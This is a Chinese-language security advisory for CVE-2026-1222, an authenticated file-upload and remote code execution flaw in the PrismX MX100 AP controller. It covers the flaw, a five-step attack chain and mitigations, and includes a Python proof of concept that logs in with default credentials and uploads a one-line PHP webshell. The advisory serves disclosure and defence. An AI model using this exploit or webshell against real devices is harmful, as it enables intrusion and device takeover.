CVE-2026-1222 PrismX MX100 AP控制器任意文件上传漏洞

漏洞信息

漏洞编号

CVE-2026-1222

漏洞类型

任意文件上传/远程代码执行

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

PrismX MX100 AP Controller (BROWAN COMMUNICATIONS)

漏洞概述

CVE-2026-1222是BROWAN COMMUNICATIONS公司开发的PrismX MX100 AP控制器中的一个高危安全漏洞。该漏洞允许具有高权限的远程攻击者利用系统的任意文件上传功能，上传恶意文件（如WebShell后门）到服务器，并成功执行任意代码。攻击成功后，攻击者可以完全控制受影响的AP控制器设备，执行系统命令、窃取敏感数据、安装后门程序，甚至将攻击范围扩展到内网其他设备。由于该设备通常部署在企业网络环境中，漏洞的存在对网络安全构成严重威胁。CVSS 3.1评分7.2，属于高危漏洞，具有高机密性、高完整性和高可用性影响。

技术细节

该漏洞存在于PrismX MX100 AP控制器的Web管理界面中。攻击者首先需要获取设备的管理员或更高权限账户。登录后，攻击者可以利用文件上传功能上传包含恶意代码的文件。系统未对上传文件的类型、内容和扩展名进行充分的验证和过滤，导致攻击者可以上传PHP、ASP或其他可执行脚本文件。上传成功后，攻击者通过访问上传的文件路径即可触发代码执行，从而在服务器上获得命令执行能力。例如，攻击者可以上传一个包含system()或exec()函数的PHP文件，通过HTTP请求调用该文件即可在服务器上执行操作系统命令。由于设备通常以root权限运行服务，攻击者甚至可以获得完全的系统控制权。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标设备为PrismX MX100 AP控制器，通过端口扫描发现Web管理界面（通常为80/443端口）

STEP 2

步骤2: 权限获取

攻击者使用暴力破解、默认凭证或已泄露的管理员凭据登录设备后台管理系统

STEP 3

步骤3: 恶意文件上传

登录后，攻击者利用系统的文件上传功能，上传包含恶意代码的WebShell文件（如PHP/ASP脚本）

STEP 4

步骤4: 代码执行

攻击者通过HTTP请求访问上传的恶意文件，触发代码执行，从而在服务器上获得命令执行能力

STEP 5

步骤5: 持久化控制

攻击者可以安装后门、导出敏感配置信息、横向移动到内网其他设备，完全控制受影响的AP控制器

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2026-1222 PoC - PrismX MX100 Arbitrary File Upload
# Target: PrismX MX100 AP Controller

TARGET = 'http://target-ip'
USERNAME = 'admin'
PASSWORD = 'admin'

def exploit():
    # Step 1: Login to get session
    session = requests.Session()
    login_data = {
        'username': USERNAME,
        'password': PASSWORD
    }
    
    resp = session.post(f'{TARGET}/login', data=login_data)
    if resp.status_code != 200:
        print('[-] Login failed')
        return
    
    print('[+] Login successful')
    
    # Step 2: Upload malicious PHP webshell
    webshell = "<?php system($_GET['cmd']); ?>"
    files = {
        'file': ('shell.php', webshell, 'application/x-php')
    }
    
    resp = session.post(f'{TARGET}/api/upload', files=files)
    if resp.status_code == 200:
        print('[+] Webshell uploaded successfully')
        print(f'[+] Access at: {TARGET}/uploads/shell.php?cmd=whoami')
    else:
        print('[-] Upload failed')

if __name__ == '__main__':
    exploit()

影响范围

PrismX MX100 AP Controller (all versions prior to patch)

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）立即修改所有默认管理员凭据，使用强密码并定期更换；2）将AP控制器的Web管理界面限制在内部管理网络，禁止公网访问；3）部署网络入侵检测系统（IDS）监控异常的HTTP请求和文件上传行为；4）定期检查系统日志，关注可疑的登录和文件操作记录；5）如业务允许，暂时禁用不必要的文件上传功能；6）对关键业务系统实施网络隔离，降低横向移动风险。